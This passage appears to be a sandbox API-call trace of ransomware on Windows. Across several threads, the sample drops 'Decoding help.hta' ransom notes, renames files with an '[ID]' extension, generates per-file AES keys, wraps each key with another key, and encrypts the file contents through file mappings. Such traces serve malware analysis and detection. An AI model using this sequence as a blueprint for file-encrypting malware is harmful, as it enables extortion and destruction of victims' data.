lpOverlapped=0x0) returned 1 [0042.953] WriteFile (in: hFile=0x6f0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1014fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.953] CloseHandle (hObject=0x6f0) returned 1 [0043.973] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.973] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x1014fd30 | out: lpFindFileData=0x1014fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0043.973] FindClose (in: hFindFile=0x5db3b8 | out: hFindFile=0x5db3b8) returned 1 Thread: id = 211 os_tid = 0x828 [0040.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*", lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8050 [0040.790] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.790] FindNextFileW (in: hFindFile=0x5d8050, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.790] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.790] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.790] FindNextFileW (in: hFindFile=0x5d8050, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="maintenanceservice-install.log", cAlternateFileName="MAINTE~1.LOG")) returned 1 [0041.232] lstrcpyW (in: lpString1=0x10fe7650, lpString2="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*" [0041.232] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*") returned 35 [0041.232] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\Decoding help.hta" [0041.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\Decoding help.hta" (normalized: "c:\\programdata\\mozilla\\logs\\decoding help.hta")) returned 0xffffffff [0041.232] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\Decoding help.hta" (normalized: "c:\\programdata\\mozilla\\logs\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0041.239] WriteFile (in: hFile=0x3bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x5a8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x5a8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.240] CloseHandle (hObject=0x3bc) returned 1 [0041.240] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.240] lstrcmpiW (lpString1="Decoding help.hta", lpString2="maintenanceservice-install.log") returned -1 [0041.240] lstrlenW (lpString="maintenanceservice-install.log") returned 30 [0041.240] lstrcmpiW (lpString1="[ID]", lpString2=".log") returned 1 [0041.240] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*" [0041.240] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*") returned 35 [0041.240] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\", lpString2="maintenanceservice-install.log" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" [0041.240] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" [0041.240] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]" [0041.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.248] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0041.248] CreateFileMappingA (hFile=0x3f4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x408 [0041.248] CryptAcquireContextA (in: phProv=0x5a8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x5a8fcec*=0x3449578) returned 1 [0043.831] CryptGenKey (in: hProv=0x3449578, Algid=0x6610, dwFlags=0x1, phKey=0x5a8fce8 | out: phKey=0x5a8fce8*=0x5d7fd0) returned 1 [0043.831] CryptExportKey (in: hKey=0x5d7fd0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x5a8fbe4, pdwDataLen=0x5a8fce4 | out: pbData=0x5a8fbe4*, pdwDataLen=0x5a8fce4*=0x2c) returned 1 [0043.831] MapViewOfFile (hFileMappingObject=0x408, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x4470000 [0044.110] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5a8fbe4*, pdwDataLen=0x5a8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x5a8fbe4*, pdwDataLen=0x5a8fcf8*=0x100) returned 1 [0047.067] CryptEncrypt (in: hKey=0x5d7fd0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4470000*, pdwDataLen=0x5a8fce4*=0xa0, dwBufLen=0xa0 | out: pbData=0x4470000*, pdwDataLen=0x5a8fce4*=0xa0) returned 1 [0047.067] UnmapViewOfFile (lpBaseAddress=0x4470000) returned 1 [0047.068] CloseHandle (hObject=0x408) returned 1 [0047.069] CryptDestroyKey (hKey=0x5d7fd0) returned 1 [0047.069] CryptReleaseContext (hProv=0x3449578, dwFlags=0x0) returned 1 [0047.069] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.069] WriteFile (in: hFile=0x3f4, lpBuffer=0x5a8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5a8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x5a8fbe4*, lpNumberOfBytesWritten=0x5a8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.608] WriteFile (in: hFile=0x3f4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x5a8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x5a8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.609] CloseHandle (hObject=0x3f4) returned 1 [0047.609] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.376] FindNextFileW (in: hFindFile=0x5d8050, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="maintenanceservice-install.log", cAlternateFileName="MAINTE~1.LOG")) returned 0 [0050.376] FindClose (in: hFindFile=0x5d8050 | out: hFindFile=0x5d8050) returned 1 Thread: id = 212 os_tid = 0x824 [0040.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*.*", lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0042.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.048] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.049] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.049] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0042.049] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 213 os_tid = 0x820 [0040.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*.*", lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 214 os_tid = 0x81c [0040.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*", lpFindFileData=0x103cfd30 | out: lpFindFileData=0x103cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5abe1b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5abe1b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8090 [0040.791] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.791] FindNextFileW (in: hFindFile=0x5d8090, lpFindFileData=0x103cfd30 | out: lpFindFileData=0x103cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5abe1b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5abe1b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.791] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.791] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.791] FindNextFileW (in: hFindFile=0x5d8090, lpFindFileData=0x103cfd30 | out: lpFindFileData=0x103cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd106f400, ftCreationTime.dwHighDateTime=0x1c2a173, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd106f400, ftLastWriteTime.dwHighDateTime=0x1c2a173, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="adodb.dll", cAlternateFileName="")) returned 1 [0041.237] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" [0041.237] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned 71 [0041.237] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta" [0041.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\decoding help.hta")) returned 0xffffffff [0041.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0041.245] WriteFile (in: hFile=0x3f4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x103cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x103cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.245] CloseHandle (hObject=0x3f4) returned 1 [0041.246] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.246] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adodb.dll") returned 1 [0041.246] lstrlenW (lpString="adodb.dll") returned 9 [0041.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" [0041.246] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned 71 [0041.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\", lpString2="adodb.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll" [0041.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll" [0041.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0041.250] CreateFileMappingA (hFile=0x3f0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x410 [0041.250] CryptAcquireContextA (in: phProv=0x103cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x103cfcec*=0x3449600) returned 1 [0043.832] CryptGenKey (in: hProv=0x3449600, Algid=0x6610, dwFlags=0x1, phKey=0x103cfce8 | out: phKey=0x103cfce8*=0x5d8710) returned 1 [0043.832] CryptExportKey (in: hKey=0x5d8710, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x103cfbe4, pdwDataLen=0x103cfce4 | out: pbData=0x103cfbe4*, pdwDataLen=0x103cfce4*=0x2c) returned 1 [0043.832] MapViewOfFile (hFileMappingObject=0x410, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b000) returned 0x4480000 [0044.189] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x103cfbe4*, pdwDataLen=0x103cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x103cfbe4*, pdwDataLen=0x103cfcf8*=0x100) returned 1 [0047.225] CryptEncrypt (in: hKey=0x5d8710, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4480000, pdwDataLen=0x103cfce4*=0x1b000, dwBufLen=0x1b000 | out: pbData=0x4480000*, pdwDataLen=0x103cfce4*=0x1b000) returned 1 [0047.255] UnmapViewOfFile (lpBaseAddress=0x4480000) returned 1 [0047.257] CloseHandle (hObject=0x410) returned 1 [0047.257] CryptDestroyKey (hKey=0x5d8710) returned 1 [0047.257] CryptReleaseContext (hProv=0x3449600, dwFlags=0x0) returned 1 [0047.257] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.257] WriteFile (in: hFile=0x3f0, lpBuffer=0x103cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x103cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x103cfbe4*, lpNumberOfBytesWritten=0x103cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.623] WriteFile (in: hFile=0x3f0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x103cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x103cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.623] CloseHandle (hObject=0x3f0) returned 1 [0047.625] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.369] FindNextFileW (in: hFindFile=0x5d8090, lpFindFileData=0x103cfd30 | out: lpFindFileData=0x103cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c210700, ftCreationTime.dwHighDateTime=0x1c2a174, ftLastAccessTime.dwLowDateTime=0x523e72d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c210700, ftLastWriteTime.dwHighDateTime=0x1c2a174, nFileSizeHigh=0x0, nFileSizeLow=0x7a3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.mshtml.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0050.369] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" [0050.369] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned 71 [0050.369] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta" [0050.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\decoding help.hta")) returned 0x1 [0050.369] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.mshtml.dll") returned -1 [0050.369] lstrlenW (lpString="Microsoft.mshtml.dll") returned 20 [0050.369] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" [0050.369] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned 71 [0050.369] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\", lpString2="Microsoft.mshtml.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" [0050.369] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" [0050.369] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0050.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0055.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, 